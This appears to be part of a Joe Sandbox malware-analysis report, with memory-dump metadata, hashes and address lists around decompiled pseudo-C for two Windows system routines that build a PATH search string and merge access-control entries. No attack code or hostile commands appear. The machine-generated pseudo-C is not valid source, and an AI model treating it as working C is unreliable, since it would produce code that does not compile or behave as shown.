0x04cbcaee
0x00000000
0x04cbc8cb
0x04cbc8d5
0x04cbc8d8
0x04cbc8da
0x04cbc8de
0x04cbc8e0
0x04cbc8e0
0x04cbc8e6
0x04cbc8ee
0x00000000
0x00000000
0x04cbc8f4
0x04cbc8f9
0x04cbcac6
0x04cbcac9
0x00000000
0x04cbc90c
0x04cbc90e
0x00000000
0x04cbc914
0x04cbc91c
0x04cbcad1
0x04cbcad1
0x04cbcad4
0x04cbcadd
0x04cbcae2
0x00000000
0x00000000
0x04cbcae4
0x00000000
0x04cbcae4
0x04cbc90e
0x04cbc8f9
0x04cbcacf
0x04cbcacf
0x00000000
0x04cbcacf
0x04cbc8bc
0x04cbc7af
0x04cbc7b5
0x00000000
0x04cbc7b7
0x04cbc7ba
0x04cbc7c2
0x04cbc7c2
0x04cbc7bc
0x04cbc7bc
0x04cbc7bc
0x04cbc7c4
0x04cbc7c7
0x04cbc7cb
0x04cbc7d0
0x04cbc7fc
0x04cbc803
0x00000000
0x04cbc826
0x04cbc826
0x04cbc829
0x00000000
0x04cbc829
0x04cbc7d7
0x04cbc7dd
0x04cbc927
0x04cbc927
0x04cbc92e
0x04cbc938
0x04cbc943
0x04cbc947
0x04cbc94c
0x04cbc94f
0x04cbc952
0x04cbca4a
0x04cbca4a
0x04cbca4f
0x04cbca4f
0x04cbca52
0x04cbca52
0x04cbca54
0x04cbca57
0x04cbca5d
0x00000000
0x00000000
0x04cbca63
0x04cbca68
0x04cbca6b
0x04cbca71
0x04cbca73
0x04cbca78
0x04cbca7b
0x04cbca7e
0x04cbca81
0x04cbca88
0x04cbca88
0x04cbca83
0x04cbca83
0x04cbca83
0x04cbca8a
0x04cbca8d
0x04cbca90
0x04cbca97
0x04cbca97
0x04cbca92
0x04cbca92
0x04cbca92
0x04cbca99
0x04cbca9c
0x04cbca9f
0x04cbcaa4
0x04cbcaa4
0x04cbcaad
0x04cbcab7
0x04cbcab7
0x00000000
0x04cbca71
0x04cbc958
0x04cbc95a
0x04cbca09
0x04cbca0c
0x04cbca0d
0x04cbca11
0x04cbca13
0x04cbca14
0x04cbca19
0x04cbca1b
0x04cbca24
0x04cbca27
0x04cbca2a
0x04cbca31
0x04cbca33
0x04cbca33
0x04cbca39
0x04cbca39
0x04cbca3c
0x04cbca40
0x00000000
0x00000000
0x04cbca42
0x04cbca1d
0x04cbca1d
0x04cbca1d
0x00000000
0x04cbca1b
0x04cbc960
0x04cbc967
0x04cbc96e
0x04cbc984
0x04cbc989
0x04cbc98b
0x04cbc991
0x04cbc993
0x04cbc9b9
0x04cbc9bb
0x04cbc9c1
0x04cbc9c3
0x04cbc9db
0x04cbc9dd
0x04cbc9e0
0x00000000
0x04cbc9e0
0x04cbc9c5
0x04cbc9c8
0x04cbc9ce
0x04cbc9e5
0x00000000
0x04cbc9d0
0x04cbc9d0
0x04cbc9d5
0x00000000
0x04cbc9d5
0x04cbc995
0x04cbc995
0x04cbc99c
0x04cbc9ef
0x04cbc9ef
0x04cbc9f1
0x04cbc9f2
0x04cbc9f4
0x04cbc9f6
0x04cbc9f7
0x04cbc9f9
0x04cbc9fd
0x04cbca02
0x04cbca05
0x04cbca07
0x00000000
0x00000000
0x00000000
0x04cbca07
0x04cbc7f9
0x04cbc7f9
0x00000000
0x04cbc7f9
0x04cbc7dd
0x04cbc7d0
0x04cbc7b5
0x04cbc77e
0x00000000
0x00000000
0x04cbc786
0x00000000
0x04cbc788
0x04cbc788
0x04cbc78d
0x00000000
0x04cbc78d
0x00000000
0x00000000
0x00000000
0x04cbd3fa
0x04cbd3fa
0x04cbd3fa
0x04cbd3ff
0x04cbd402
0x04cbd40a
0x04cbd40b
0x04cbd40c
0x04cbd41a
0x04cbd41a

Strings

MUI, xrefs: 04CBC7E3, 04CBC960

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: db7ce9fbe17f17b558e0fe35792d579881091b49bed55cdf2a0c0b9e05d44385
Instruction ID: beb308d47d8bba9d73615b9b486a0138e26f260f2640a3bca97a7d06746fc830
Opcode Fuzzy Hash: db7ce9fbe17f17b558e0fe35792d579881091b49bed55cdf2a0c0b9e05d44385
Instruction Fuzzy Hash: 8B825E75E002199FEB24CFA9C8807EDB7B6FF44314F148169E89AAB351D734AE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CB2EE8 Relevance: 1.7, Strings: 1, Instructions: 410
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E04CB2EE8(intOrPtr __ecx, signed int __edx, void* _a4, char _a8) {
				signed int _v8;
				unsigned int _v28;
				void _v32;
				char _v33;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t150;
				signed int _t165;
				signed int _t171;
				signed int _t182;
				signed int _t184;
				signed int _t185;
				signed int _t194;
				signed int _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t210;
				void* _t211;

				_v8 =  *0x4dab370 ^ _t209;
				_v68 = __ecx;
				_v56 = __edx;
				_t199 = 0;
				_v88 = 0;
				_v72 = 0;
				_v84 = 0;
				_v80 = 0;
				_v52 = 0;
				_v33 = 0;
				_t185 = 0x50;
				_v60 = 0;
				_v76 = 0;
				_v44 = 0;
				_push(6);
				_t150 = memcpy( &_v32, 0x4da92e8, 0 << 2);
				_t211 = _t210 + 0xc;
				_t207 = 0;
				_t205 = 0;
				_t192 = _v28 >> 0x0000001c & 0x00000003;
				_v64 = _t150;
				_v48 = 0;
				_v40 = _v28 >> 0x0000001c & 0x00000003;
				if(_v56 <= 0) {
					L32:
					_t58 = _t185 - 0x50; // 0x0
					if(_t58 <= 0xfffe) {
						L36:
						_t207 = E04CC5D90(_t192,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t207, _t185);
						_v60 = _t207;
						if(_t207 != 0) {
							_t63 = _t207 + 0x50; // 0x50
							_t205 = _t63;
							 *(_t207 + 0x44) = _t185;
							 *((intOrPtr*)(_t207 + 0x38)) = 0;
							_t185 = 0;
							 *((intOrPtr*)(_t207 + 0x3c)) = 0;
							 *((intOrPtr*)(_t207 + 0x40)) = 0;
							 *(_t207 + 0x4c) = 0;
							_t199 = _v44;
							 *((short*)(_t207 + 0x30)) = _v56;
							if(_t199 != 0) {
								 *(_t207 + 0x18) = _t205;
								 *_t207 = ((0 | _t199 == 0x04da6600) - 0x00000001 & 0xfffffffb) + 7;
								E04CF88C0(_t205,  *((intOrPtr*)(_t199 + 4)),  *_t199 & 0x0000ffff);
								_t199 = _v44;
								_t211 = _t211 + 0xc;
								_t185 = 1;
								_t205 = _t205 + (( *_t199 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t182 = E04D3D07E(_v33, _t205);
									_t199 = _v44;
									_t205 = _t182;
								}
							}
							_t194 = 0;
							_v40 = 0;
							if(_v56 <= 0) {
								L67:
								_t208 = _v76;
								 *((short*)(_t205 - 2)) = 0;
								L68:
								_t155 = _v80;
								if(_v80 != 0) {
									E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t155);
								}
								_t156 = _v60;
								if(_v60 != 0 && _t208 < 0) {
									E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t156);
									_t156 = 0;
								}
								L73:
								return E04CF4B50(_t156, _t185, _v8 ^ _t209, _t199, _t205, _t208);
							} else {
								_t185 = _t207 + _t185 * 4;
								_v64 = _t185;
								do {
									if(_t199 == 0) {
										L46:
										 *_t185 =  *(_v68 + _t194 * 4);
										 *(_t185 + 0x18) = _t205;
										_t165 =  *(_v68 + _t194 * 4);
										if(_t165 > 8) {
											L35:
											_t192 = 0x25;
											asm("int 0x29");
											goto L36;
										}
										switch( *((intOrPtr*)(_t165 * 4 +  &M04CB3428))) {
											case 0:
												__ax =  *0x4da6610;
												__eflags = __ax;
												if(__ax == 0) {
													goto L65;
												}
												__ax & 0x0000ffff = E04CF88C0(__edi,  *0x4da6614, __ax & 0x0000ffff);
												__eax =  *0x4da6610 & 0x0000ffff;
												goto L51;
											case 1:
												L56:
												__eax = E04CF88C0(__edi, _v88, _v72);
												__eax = _v72;
												goto L51;
											case 2:
												 *0x4da6608 & 0x0000ffff = E04CF88C0(__edi,  *0x4da660c,  *0x4da6608 & 0x0000ffff);
												__eax =  *0x4da6608 & 0x0000ffff;
												__eax = ( *0x4da6608 & 0x0000ffff) >> 1;
												__edi = __edi + __eax * 2;
												goto L53;
											case 3:
												__eax = _v52;
												__eflags = __eax;
												if(__eax == 0) {
													goto L65;
												}
												__esi = __eax + __eax;
												__eax = E04CF88C0(__edi, _v80, __esi);
												__edi = __edi + __esi;
												__esi = _v60;
												goto L52;
											case 4:
												_push(0x2e);
												_pop(_t166);
												 *(_t207 + 0x4c) = _t205;
												 *_t205 = _t166;
												_t205 = _t205 + 4;
												_push(0x3b);
												_pop(_t167);
												 *((short*)(_t205 - 2)) = _t167;
												goto L65;
											case 5:
												__eflags = _v48;
												if(_v48 == 0) {
													goto L56;
												}
												__eax = E04CF88C0(__edi, _v84, _v48);
												__eax = _v48;
												L51:
												__eax = __eax >> 1;
												__esp = __esp + 0xc;
												__edi = __edi + __eax * 2;
												__edi = __edi + 2;
												__eflags = __edi;
												L52:
												_push(0x3b);
												_pop(__eax);
												 *(__edi - 2) = __ax;
												goto L53;
											case 6:
												__ebx =  *0x4da33d8;
												__eflags = __ebx - 0x4da33d8;
												if(__ebx == 0x4da33d8) {
													L64:
													__ebx = _v64;
													goto L65;
												}
												_push(0x3b);
												_pop(__esi);
												do {
													__eax =  *(__ebx + 8) & 0x0000ffff;
													_t119 = __ebx + 0xa; // 0x77dc33e2
													_t119 = E04CF88C0(__edi, _t119,  *(__ebx + 8) & 0x0000ffff);
													__eax =  *(__ebx + 8) & 0x0000ffff;
													__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													 *(__edi - 2) = __si;
													__ebx =  *__ebx;
													__eflags = __ebx - 0x4da33d8;
												} while (__ebx != 0x4da33d8);
												__esi = _v60;
												__ecx = _v40;
												__edx = _v44;
												goto L64;
											case 7:
												 *0x4da6600 & 0x0000ffff = E04CF88C0(__edi,  *0x4da6604,  *0x4da6600 & 0x0000ffff);
												__eax =  *0x4da6600 & 0x0000ffff;
												__eax = ( *0x4da6600 & 0x0000ffff) >> 1;
												__eflags = _a8;
												__edi = __edi + __eax * 2;
												if(_a8 != 0) {
													__cl = _v33;
													__edx = __edi;
													__eax = E04D3D07E(__ecx, __edi);
													__edi = __eax;
												}
												goto L53;
											case 8:
												__eflags =  *0x4da4ff8;
												if( *0x4da4ff8 == 0) {
													L65:
													_t185 = _t185 + 4;
													__eflags = _t185;
													_v64 = _t185;
													goto L66;
												}
												__eax = 0;
												 *(__edi - 2) = __ax;
												 *0x4da4ff8 & 0x0000ffff = E04CF88C0(__edi,  *0x4da4ffc,  *0x4da4ff8 & 0x0000ffff);
												__eax =  *0x4da690c; // 0x0
												 *(__esi + 0x40) = __edi;
												 *(__esi + 0x3c) = __eax;
												__eax =  *0x4da4ff8 & 0x0000ffff;
												__eax = ( *0x4da4ff8 & 0x0000ffff) >> 1;
												__edi = __edi + __eax * 2;
												__edi = __edi + 2;
												L53:
												__ecx = _v40;
												__edx = _v44;
												goto L65;
										}
									}
									_t171 =  *(_v68 + _t194 * 4);
									if(_t171 == 0) {
										goto L66;
									}
									if(_t171 == 5) {
										goto L66;
									}
									goto L46;
									L66:
									_t194 = _t194 + 1;
									_v40 = _t194;
								} while (_t194 < _v56);
								goto L67;
							}
						}
						_t208 = 0xc0000017;
						goto L68;
					}
					_t208 = 0xc0000106;
					goto L68;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t184 =  *(_v68 + _t205 * 4);
					if(_t184 > 8) {
						goto L35;
					}
					switch( *((intOrPtr*)(_t184 * 4 +  &M04CB3404))) {
						case 0:
							__ax =  *0x4da6610;
							goto L28;
						case 1:
							L9:
							__edx =  &_v72;
							__ecx = 0;
							__eax = E04CB344C(0,  &_v72);
							_v72 = _v72 + 2;
							_v88 = __eax;
							__ebx = __ebx + _v72 + 2;
							__eflags = __ebx;
							goto L10;
						case 2:
							__eax =  *0x4da6608 & 0x0000ffff;
							__ebx = __ebx + __eax;
							__eflags = __cl - 1;
							if(__cl != 1) {
								goto L31;
							} else {
								__eax = 0x4da6608;
								goto L13;
							}
						case 3:
							E04CBFED0(0x4da5b40) =  &_v52;
							__esi = E04CBF870(__esi, L"PATH", 4, __esi, __esi,  &_v52);
							_v76 = __esi;
							__eflags = __esi - 0xc0000023;
							if(__esi != 0xc0000023) {
								L17:
								_push(0x4da5b40);
								__eax = E04CBE740(__ecx);
								__eflags = __esi - 0xc0000100;
								if(__esi != 0xc0000100) {
									__eflags = __esi;
									if(__esi < 0) {
										goto L68;
									}
									__eax = _v52;
									__edx = _v48;
									__ecx = _v40;
									__ebx = __ebx + __eax * 2;
									__ebx = __ebx + 2;
									__esi = 0;
									goto L31;
								}
								__esi = 0;
								_v52 = 0;
								_v76 = 0;
								L10:
								__edx = _v48;
								__ecx = _v40;
								goto L31;
							}
							__eax = _v52;
							__ecx =  *0x4da5d78; // 0x0
							_v52 + _v52 =  *[fs:0x30];
							__ecx = __ecx + 0x180000;
							__eax = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
							_v80 = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								_push(0x4da5b40);
								__eax = E04CBE740(__ecx);
								__eax = _v60;
								goto L73;
							}
							__ecx =  &_v52;
							__eax = E04CBF870(0, L"PATH", 4, __eax, _v52,  &_v52);
							__esi = __eax;
							_v76 = __eax;
							goto L17;
						case 4:
							_t185 = _t185 + 4;
							goto L31;
						case 5:
							__eax = _v64;
							__eflags = __eax;
							if(__eax != 0) {
								__edx =  &_v48;
								__ecx = __eax;
								__eax = E04CB344C(__eax,  &_v48);
								__edx = _v48;
								__ecx = _v40;
								_v84 = __eax;
							}
							__eflags = __edx;
							if(__edx == 0) {
								goto L9;
							} else {
								__ebx = __ebx + 2;
								__ebx = __ebx + __edx;
								goto L31;
							}
						case 6:
							__eax =  *0x4da33e0 & 0x0000ffff;
							goto L30;
						case 7:
							__ecx =  *0x4da6600 & 0x0000ffff;
							__ebx = __ebx + __ecx;
							__eflags = _a8;
							if(__eflags != 0) {
								__eax =  *0x4da391c; // 0x16
								__eax = __eax & 0x00000100;
								_v33 = __eflags != 0;
								__ebx = __ebx + 0x16;
								__ebx = __ebx + __ecx;
								__eflags = __eax;
								if(__eax != 0) {
									__ebx = __ebx + 0x1e;
									__ebx = __ebx + __ecx;
									__eflags = __ebx;
								}
							}
							__ecx = _v40;
							__eflags = __cl - 1;
							if(__cl == 1) {
								__eax = 0x4da6600;
								L13:
								_v44 = __eax;
							}
							goto L31;
						case 8:
							__ax =  *0x4da4ff8;
							L28:
							__eflags = __ax;
							if(__ax == 0) {
								L31:
								_t205 = _t205 + 1;
								if(_t205 < _v56) {
									goto L1;
								}
								goto L32;
							}
							__eax = __ax & 0x0000ffff;
							__eax = (__ax & 0x0000ffff) + 2;
							__eflags = __eax;
							L30:
							__ebx = __ebx + __eax;
							__eflags = __ebx;
							goto L31;
					}
				}
				goto L35;
			}

0x04cb2ef7
0x04cb2f00
0x04cb2f08
0x04cb2f0d
0x04cb2f0f
0x04cb2f12
0x04cb2f1a
0x04cb2f1d
0x04cb2f20
0x04cb2f23
0x04cb2f26
0x04cb2f27
0x04cb2f2a
0x04cb2f2d
0x04cb2f30
0x04cb2f33
0x04cb2f33
0x04cb2f38
0x04cb2f3d
0x04cb2f3f
0x04cb2f42
0x04cb2f45
0x04cb2f48
0x04cb2f4e
0x04cb30f8
0x04cb30f8
0x04cb3100
0x04cb3123
0x04cb3133
0x04cb3135
0x04cb313a
0x04cb3149
0x04cb3149
0x04cb314e
0x04cb3151
0x04cb3154
0x04cb3156
0x04cb3159
0x04cb315c
0x04cb315f
0x04cb3162
0x04cb3168
0x04cb316c
0x04cb317f
0x04cb3189
0x04cb318e
0x04cb3191
0x04cb3194
0x04cb319e
0x04cb31a1
0x04cb31a8
0x04cb31ad
0x04cb31b0
0x04cb31b0
0x04cb31a1
0x04cb31b2
0x04cb31b4
0x04cb31ba
0x04cb3329
0x04cb3329
0x04cb332e
0x04cb3332
0x04cb3332
0x04cb3337
0x04cb3345
0x04cb3345
0x04cb334a
0x04cb334f
0x04cb3361
0x04cb3366
0x04cb3366
0x04cb3368
0x04cb3376
0x04cb31c0
0x04cb31c0
0x04cb31c3
0x04cb31c6
0x04cb31c8
0x04cb31e3
0x04cb31e9
0x04cb31ee
0x04cb31f1
0x04cb31f7
0x04cb311e
0x04cb3120
0x04cb3121
0x00000000
0x04cb3121
0x04cb31fd
0x00000000
0x04cb321c
0x04cb3222
0x04cb3225
0x00000000
0x00000000
0x04cb3236
0x04cb323b
0x00000000
0x00000000
0x04cb3276
0x04cb327d
0x04cb3282
0x00000000
0x00000000
0x04cb3296
0x04cb329b
0x04cb32a5
0x04cb32a7
0x00000000
0x00000000
0x04cb32ac
0x04cb32af
0x04cb32b1
0x00000000
0x00000000
0x04cb32b3
0x04cb32bb
0x04cb32c6
0x04cb32c8
0x00000000
0x00000000
0x04cb3204
0x04cb3206
0x04cb3207
0x04cb320a
0x04cb320d
0x04cb3210
0x04cb3212
0x04cb3213
0x00000000
0x00000000
0x04cb325f
0x04cb3263
0x00000000
0x00000000
0x04cb326c
0x04cb3271
0x04cb3242
0x04cb3242
0x04cb3244
0x04cb3247
0x04cb324a
0x04cb324a
0x04cb324d
0x04cb324d
0x04cb324f
0x04cb3250
0x00000000
0x00000000
0x04cb32cd
0x04cb32d3
0x04cb32d9
0x04cb3313
0x04cb3313
0x00000000
0x04cb3313
0x04cb32db
0x04cb32dd
0x04cb32de
0x04cb32de
0x04cb32e3
0x04cb32e8
0x04cb32ed
0x04cb32f4
0x04cb32f6
0x04cb32f9
0x04cb32fc
0x04cb3300
0x04cb3302
0x04cb3302
0x04cb330a
0x04cb330d
0x04cb3310
0x00000000
0x00000000
0x04cb3388
0x04cb338d
0x04cb3397
0x04cb3399
0x04cb339d
0x04cb33a0
0x04cb33a6
0x04cb33a9
0x04cb33ab
0x04cb33b0
0x04cb33b0
0x00000000
0x00000000
0x04cb33b7
0x04cb33bf
0x04cb3316
0x04cb3316
0x04cb3316
0x04cb3319
0x00000000
0x04cb3319
0x04cb33c5
0x04cb33c7
0x04cb33da
0x04cb33df
0x04cb33e7
0x04cb33ea
0x04cb33ed
0x04cb33f4
0x04cb33f6
0x04cb33f9
0x04cb3254
0x04cb3254
0x04cb3257
0x00000000
0x00000000
0x04cb31fd
0x04cb31d1
0x04cb31d4
0x00000000
0x00000000
0x04cb31dd
0x00000000
0x00000000
0x00000000
0x04cb331c
0x04cb331c
0x04cb331d
0x04cb3320
0x00000000
0x04cb31c6
0x04cb31ba
0x04cb313c
0x00000000
0x04cb313c
0x04cb3102
0x00000000
0x00000000
0x00000000
0x00000000
0x04cb2f54
0x04cb2f54
0x04cb2f57
0x04cb2f5d
0x00000000
0x00000000
0x04cb2f63
0x00000000
0x04cb2f72
0x00000000
0x00000000
0x04cb2fa5
0x04cb2fa5
0x04cb2fa8
0x04cb2faa
0x04cb2fb2
0x04cb2fb5
0x04cb2fb8
0x04cb2fb8
0x00000000
0x00000000
0x04cb2fc5
0x04cb2fcc
0x04cb2fce
0x04cb2fd1
0x00000000
0x04cb2fd7
0x04cb2fd7
0x00000000
0x04cb2fd7
0x00000000
0x04cb2fee
0x04cb3001
0x04cb3003
0x04cb3006
0x04cb300c
0x04cb3055
0x04cb3055
0x04cb305a
0x04cb305f
0x04cb3065
0x04cb3074
0x04cb3076
0x00000000
0x00000000
0x04cb307c
0x04cb307f
0x04cb3082
0x04cb3085
0x04cb3088
0x04cb308b
0x00000000
0x04cb308b
0x04cb3067
0x04cb3069
0x04cb306c
0x04cb2fba
0x04cb2fba
0x04cb2fbd
0x00000000
0x04cb2fbd
0x04cb300e
0x04cb3011
0x04cb301a
0x04cb3020
0x04cb302a
0x04cb302f
0x04cb3032
0x04cb3034
0x04cb310c
0x04cb3111
0x04cb3116
0x00000000
0x04cb3116
0x04cb303a
0x04cb304b
0x04cb3050
0x04cb3052
0x00000000
0x00000000
0x04cb2f6a
0x00000000
0x00000000
0x04cb2f7d
0x04cb2f80
0x04cb2f82
0x04cb2f84
0x04cb2f87
0x04cb2f89
0x04cb2f8e
0x04cb2f91
0x04cb2f94
0x04cb2f94
0x04cb2f97
0x04cb2f99
0x00000000
0x04cb2f9b
0x04cb2f9b
0x04cb2f9e
0x00000000
0x04cb2f9e
0x00000000
0x04cb308f
0x00000000
0x00000000
0x04cb3098
0x04cb309f
0x04cb30a1
0x04cb30a5
0x04cb30a7
0x04cb30ac
0x04cb30b1
0x04cb30b5
0x04cb30b8
0x04cb30ba
0x04cb30bc
0x04cb30c1
0x04cb30c4
0x04cb30c4
0x04cb30c6
0x04cb30bc
0x04cb30c9
0x04cb30cc
0x04cb30cf
0x04cb30d1
0x04cb2fdc
0x04cb2fdc
0x04cb2fdc
0x00000000
0x00000000
0x04cb30db
0x04cb30e1
0x04cb30e1
0x04cb30e4
0x04cb30ee
0x04cb30ee
0x04cb30f2
0x00000000
0x00000000
0x00000000
0x04cb30f2
0x04cb30e6
0x04cb30e9
0x04cb30e9
0x04cb30ec
0x04cb30ec
0x04cb30ec
0x00000000
0x00000000
0x04cb2f63
0x00000000

Strings

PATH, xrefs: 04CB2FF6, 04CB3044

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: dda46c8dafd9978bb2d8337813f4813b05cb7f58d9d2c30aa1ac894b5d5abaf9
Instruction ID: 8bf99f7dc2f3151c2fd34ed9cd5ba3b8f307707524e4acf493d9c58277c6e7b0
Opcode Fuzzy Hash: dda46c8dafd9978bb2d8337813f4813b05cb7f58d9d2c30aa1ac894b5d5abaf9
Instruction Fuzzy Hash: 63F18E71E00658EBDB24DF99D880AEEB7B6FF48700F094019E981AB360D775BD51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D4C7B0 Relevance: 1.6, Strings: 1, Instructions: 353
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D4C7B0(void* __edx, signed int _a4, signed int _a8, signed int* _a12, intOrPtr _a16) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _t184;
				signed int _t185;
				void* _t186;
				intOrPtr _t188;
				signed short _t192;
				signed int _t193;
				signed int _t194;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t231;
				signed int _t236;
				signed int _t243;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t259;
				signed int* _t260;
				signed int _t261;
				intOrPtr _t262;
				signed int _t263;
				signed int _t264;
				signed int _t269;
				signed int _t277;
				signed int _t284;
				signed int _t289;
				signed int _t292;
				char* _t293;
				char* _t294;
				signed int _t295;
				char* _t296;
				signed int _t297;
				void* _t298;

				_t260 = _a12;
				_t259 = 0;
				_v5 = 0;
				_v24 = 0;
				_t297 = 0;
				if(_t260 != 0) {
					_t184 = _a4;
					_t292 = _a8;
					__eflags = _t184;
					if(_t184 != 0) {
						_t261 =  *(_t184 + 2) & 0x0000ffff;
						goto L6;
					} else {
						__eflags = _t292;
						if(_t292 == 0) {
							L74:
							_t259 = _t297;
						} else {
							_t261 = 0;
							L6:
							__eflags = _t292;
							if(_t292 == 0) {
								_t185 = _t259;
							} else {
								_t185 =  *(_t292 + 2) & 0x0000ffff;
							}
							_t262 = _t261 + _t185;
							_t186 = 8;
							_v16 = _t262;
							__eflags = _t262 - _t186;
							if(_t262 < _t186) {
								L77:
								_v24 = 0xc0000077;
								goto L78;
							} else {
								_t188 =  *0x4da5d78; // 0x0
								_t297 = E04CC5D90(_t262,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t188 + 0x140000, _t262);
								__eflags = _t297;
								if(_t297 != 0) {
									 *_t297 = _t259;
									_t12 = _t297 + 8; // 0x8
									_t192 = 8;
									 *(_t297 + 4) = _t259;
									 *(_t297 + 2) = _t192;
									_t193 = _a4;
									 *_t297 = 2;
									_v12 = _t12;
									__eflags = _t193;
									if(_t193 == 0) {
										L29:
										__eflags = _t292;
										if(_t292 == 0) {
											L40:
											_t194 = _a4;
											__eflags = _t194;
											if(_t194 == 0) {
												L65:
												__eflags = _t292;
												if(_t292 == 0) {
													L73:
													_t260 = _a12;
													goto L74;
												} else {
													__eflags = _a16 - _t259;
													if(_a16 != _t259) {
														_t293 = _t292 + 8;
														_t263 = _t259;
														__eflags = 0 -  *(_a8 + 4);
														_t277 = _v12;
														while(1) {
															_v28 = _t263;
															if(__eflags >= 0) {
																goto L73;
															}
															__eflags =  *_t293 - 0x12;
															if( *_t293 == 0x12) {
																L71:
																_t263 = _t263 + 1;
																_t293 = _t293 + ( *(_t293 + 2) & 0x0000ffff);
																__eflags = _t263 - ( *(_a8 + 4) & 0x0000ffff);
																continue;
															} else {
																 *(_t297 + 2) =  *(_t297 + 2) +  *(_t293 + 2);
																__eflags = ( *(_t297 + 2) & 0x0000ffff) - _v16;
																if(( *(_t297 + 2) & 0x0000ffff) > _v16) {
																	goto L76;
																} else {
																	E04CF88C0(_t277, _t293,  *(_t293 + 2) & 0x0000ffff);
																	_t298 = _t298 + 0xc;
																	 *(_t297 + 4) =  *(_t297 + 4) + 1;
																	_t263 = _v28;
																	_t277 = _v12 + ( *(_t293 + 2) & 0x0000ffff);
																	__eflags = _t277;
																	_v12 = _t277;
																	goto L71;
																}
															}
															goto L75;
														}
													}
													goto L73;
												}
											} else {
												_t264 = _t194 + 8;
												_v28 = _t259;
												_t206 =  *(_t194 + 4) & 0x0000ffff;
												_t294 = _t264;
												_v20 = _t264;
												_v32 = _t206;
												__eflags = 0 - _t206;
												_t281 = _v12;
												if(0 >= _t206) {
													_t207 = _v32;
													goto L59;
												} else {
													do {
														__eflags =  *_t294 - 0x12;
														if( *_t294 != 0x12) {
															goto L56;
														} else {
															__eflags =  *(_t294 + 1) & 0x00000010;
															if(( *(_t294 + 1) & 0x00000010) == 0) {
																goto L56;
															} else {
																_t219 = E04D4C619(_t294, _t297, _t259,  &_v5);
																__eflags = _t219;
																if(_t219 != 0) {
																	_t281 = _v12;
																	goto L56;
																} else {
																	_t220 = _a8;
																	__eflags = _t220;
																	if(_t220 == 0) {
																		_t221 = _t259;
																	} else {
																		_t221 = E04D4C619(_t294, _t220, 1,  &_v5);
																	}
																	__eflags = _t221;
																	if(_t221 == 0) {
																		L53:
																		 *(_t297 + 2) =  *(_t297 + 2) +  *(_t294 + 2);
																		__eflags = ( *(_t297 + 2) & 0x0000ffff) - _v16;
																		if(( *(_t297 + 2) & 0x0000ffff) > _v16) {
																			goto L76;
																		} else {
																			E04CF88C0(_v12, _t294,  *(_t294 + 2) & 0x0000ffff);
																			_t284 = _v12;
																			_t298 = _t298 + 0xc;
																			 *(_t297 + 4) =  *(_t297 + 4) + 1;
																			 *(_t284 + 1) =  *(_t284 + 1) & 0x000000ef;
																			goto L52;
																		}
																	} else {
																		__eflags = _v5 - _t259;
																		if(_v5 == _t259) {
																			goto L53;
																		} else {
																			 *(_t297 + 2) =  *(_t297 + 2) +  *(_t294 + 2);
																			__eflags = ( *(_t297 + 2) & 0x0000ffff) - _v16;
																			if(( *(_t297 + 2) & 0x0000ffff) > _v16) {
																				goto L76;
																			} else {
																				E04CF88C0(_v12, _t294,  *(_t294 + 2) & 0x0000ffff);
																				_t284 = _v12;
																				_t298 = _t298 + 0xc;
																				 *(_t297 + 4) =  *(_t297 + 4) + 1;
																				_t114 = _t284 + 1;
																				 *_t114 =  *(_t284 + 1) | 0x00000010;
																				__eflags =  *_t114;
																				L52:
																				_t281 = _t284 + ( *(_t294 + 2) & 0x0000ffff);
																				_v12 = _t284 + ( *(_t294 + 2) & 0x0000ffff);
																				goto L56;
																			}
																		}
																	}
																}
															}
														}
														goto L75;
														L56:
														_v28 = _v28 + 1;
														_t294 = _t294 + ( *(_t294 + 2) & 0x0000ffff);
														_t207 =  *(_a4 + 4) & 0x0000ffff;
														__eflags = _v28 - _t207;
													} while (_v28 < _t207);
													_t264 = _v20;
													L59:
													_v32 = _v32 & _t259;
													_t295 = _t259;
													__eflags = _v32 - _t207;
													if(_v32 >= _t207) {
														L64:
														_t292 = _a8;
														goto L65;
													} else {
														do {
															__eflags =  *_t264 - 0x12;
															if( *_t264 == 0x12) {
